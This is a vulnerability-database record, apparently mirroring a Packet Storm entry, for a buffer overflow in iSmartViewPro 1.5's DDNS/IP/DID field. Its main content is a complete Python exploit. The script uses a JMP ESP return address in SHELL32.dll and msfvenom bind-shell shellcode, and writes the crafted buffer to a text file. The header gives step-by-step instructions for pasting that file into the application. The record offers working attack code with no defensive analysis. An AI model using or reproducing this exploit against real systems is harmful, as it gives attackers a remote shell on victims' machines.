{"id": "PACKETSTORM:149221", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "iSmartViewPro 1.5 DDNS Buffer Overflow", "description": "", "published": "2018-09-04T00:00:00", "modified": "2018-09-04T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/149221/iSmartViewPro-1.5-DDNS-Buffer-Overflow.html", "reporter": "Luis Martinez", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-09-06T10:33:17", "viewCount": 11, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.9}, "_state": {"dependencies": 1678917980, "score": 1678916296, "epss": 1678938645}, "_internal": {"score_hash": "426e7efa3615c3da6462b13e17a07e87"}, "sourceHref": "https://packetstormsecurity.com/files/download/149221/ismartviewpro15ddns-overflow.txt", "sourceData": "`# Exploit Title: iSmartViewPro 1.5 - 'DDNS/IP/DID' Buffer Overflow \n# Discovery by: Luis Martinez \n# Discovery Date: 2018-09-03 \n# Vendor Homepage: https://securimport.com/ \n# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 \n# Tested Version: 1.5 \n# Vulnerability Type: Buffer Overflow \n# Tested on OS: Windows XP Professional SP3 x86 es \n \n# Steps to Produce the Buffer Overflow: \n# 1.- Run python code : iSmartViewPro_1.5.py \n# 2.- Open iSmartViewPro_1.5.txt and copy content to clipboard \n# 3.- Open iSmartViewPro \n# 4.- Add Device \n# 5.- Add device manually \n# 6.- Device alias -> test \n# 7.- Paste ClipBoard on \"DDNS/IP/DID\" \n# 8.- Account -> admin \n# 9.- Password -> admin \n# 10.- Save \n \n#!/usr/bin/env python \n \n#7E6B30D7 FFE4 JMP ESP SHELL32.dll \nret = \"\\xD7\\x30\\x6B\\x7E\" \n \n#msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0A\\x0D' -f c \nshellcode = ( \n\"\\xbb\\x3c\\xd8\\x80\\xcc\\xda\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9\\xb1\" \n\"\\x53\\x31\\x5a\\x12\\x03\\x5a\\x12\\x83\\xd6\\x24\\x62\\x39\\xda\\x3d\\xe1\" \n\"\\xc2\\x22\\xbe\\x86\\x4b\\xc7\\x8f\\x86\\x28\\x8c\\xa0\\x36\\x3a\\xc0\\x4c\" \n\"\\xbc\\x6e\\xf0\\xc7\\xb0\\xa6\\xf7\\x60\\x7e\\x91\\x36\\x70\\xd3\\xe1\\x59\" \n\"\\xf2\\x2e\\x36\\xb9\\xcb\\xe0\\x4b\\xb8\\x0c\\x1c\\xa1\\xe8\\xc5\\x6a\\x14\" \n\"\\x1c\\x61\\x26\\xa5\\x97\\x39\\xa6\\xad\\x44\\x89\\xc9\\x9c\\xdb\\x81\\x93\" \n\"\\x3e\\xda\\x46\\xa8\\x76\\xc4\\x8b\\x95\\xc1\\x7f\\x7f\\x61\\xd0\\xa9\\xb1\" \n\"\\x8a\\x7f\\x94\\x7d\\x79\\x81\\xd1\\xba\\x62\\xf4\\x2b\\xb9\\x1f\\x0f\\xe8\" \n\"\\xc3\\xfb\\x9a\\xea\\x64\\x8f\\x3d\\xd6\\x95\\x5c\\xdb\\x9d\\x9a\\x29\\xaf\" \n\"\\xf9\\xbe\\xac\\x7c\\x72\\xba\\x25\\x83\\x54\\x4a\\x7d\\xa0\\x70\\x16\\x25\" \n\"\\xc9\\x21\\xf2\\x88\\xf6\\x31\\x5d\\x74\\x53\\x3a\\x70\\x61\\xee\\x61\\x1d\" \n\"\\x46\\xc3\\x99\\xdd\\xc0\\x54\\xea\\xef\\x4f\\xcf\\x64\\x5c\\x07\\xc9\\x73\" \n\"\\xa3\\x32\\xad\\xeb\\x5a\\xbd\\xce\\x22\\x99\\xe9\\x9e\\x5c\\x08\\x92\\x74\" \n\"\\x9c\\xb5\\x47\\xe0\\x94\\x10\\x38\\x17\\x59\\xe2\\xe8\\x97\\xf1\\x8b\\xe2\" \n\"\\x17\\x2e\\xab\\x0c\\xf2\\x47\\x44\\xf1\\xfd\\x76\\xc9\\x7c\\x1b\\x12\\xe1\" \n\"\\x28\\xb3\\x8a\\xc3\\x0e\\x0c\\x2d\\x3b\\x65\\x24\\xd9\\x74\\x6f\\xf3\\xe6\" \n\"\\x84\\xa5\\x53\\x70\\x0f\\xaa\\x67\\x61\\x10\\xe7\\xcf\\xf6\\x87\\x7d\\x9e\" \n\"\\xb5\\x36\\x81\\x8b\\x2d\\xda\\x10\\x50\\xad\\x95\\x08\\xcf\\xfa\\xf2\\xff\" \n\"\\x06\\x6e\\xef\\xa6\\xb0\\x8c\\xf2\\x3f\\xfa\\x14\\x29\\xfc\\x05\\x95\\xbc\" \n\"\\xb8\\x21\\x85\\x78\\x40\\x6e\\xf1\\xd4\\x17\\x38\\xaf\\x92\\xc1\\x8a\\x19\" \n\"\\x4d\\xbd\\x44\\xcd\\x08\\x8d\\x56\\x8b\\x14\\xd8\\x20\\x73\\xa4\\xb5\\x74\" \n\"\\x8c\\x09\\x52\\x71\\xf5\\x77\\xc2\\x7e\\x2c\\x3c\\xf2\\x34\\x6c\\x15\\x9b\" \n\"\\x90\\xe5\\x27\\xc6\\x22\\xd0\\x64\\xff\\xa0\\xd0\\x14\\x04\\xb8\\x91\\x11\" \n\"\\x40\\x7e\\x4a\\x68\\xd9\\xeb\\x6c\\xdf\\xda\\x39\") \n \nbuffer = \"\\x41\" * 383 + ret + \"\\x90\" * 8 + shellcode \nf = open (\"iSmartViewPro_1.5.txt\", \"w\") \nf.write(buffer) \nf.close() \n \n \n`\n"}
{}
iSmartViewPro 1.5 DDNS Buffer Overflow